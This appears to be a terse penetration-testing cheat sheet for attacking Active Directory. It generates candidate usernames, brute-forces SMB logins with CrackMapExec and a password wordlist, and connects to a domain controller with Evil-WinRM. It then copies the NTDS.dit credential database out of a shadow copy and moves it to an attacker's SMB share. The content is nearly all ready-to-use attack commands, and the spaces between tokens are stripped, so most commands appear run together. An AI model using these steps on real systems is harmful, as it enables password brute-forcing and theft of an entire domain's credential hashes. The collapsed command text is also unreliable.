Dictionary Attacks against AD accounts using CrackMapExec
Creating a Custom list of Usernames
Username Anarchy
# Installation - <https://github.com/urbanadventurer/username-anarchy># Usage, names.txt contains usernames that we have gathered during information gathering./username-anarchy-inames.txt
Launching the Attack with CrackMapExec
# Brute forcing against valid usernamecrackmapexecsmbip-ubwilliamson-p/usr/share/wordlists/fasttrack.txt
Capturing NTDS.dit
# Connecting to a DC with Evil-WinRM with valid user/passevil-winrm-iip-ueren-ppas# Checking Local Group Membershipnetlocalgroup# Checking User Account Privileges including Domainnetusereren# Creating Shadow Copy of C:vssadminCREATESHADOW/For=C:# Copying NTDS.dit from the VSScmd.exe/ccopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.ditc:\\NTDS\\NTDS.dit# Transferring NTDS.dit to Attack Host using smbservercmd.exe/cmoveC:\\NTDS\\NTDS.dit \\\\attackerip\\CompData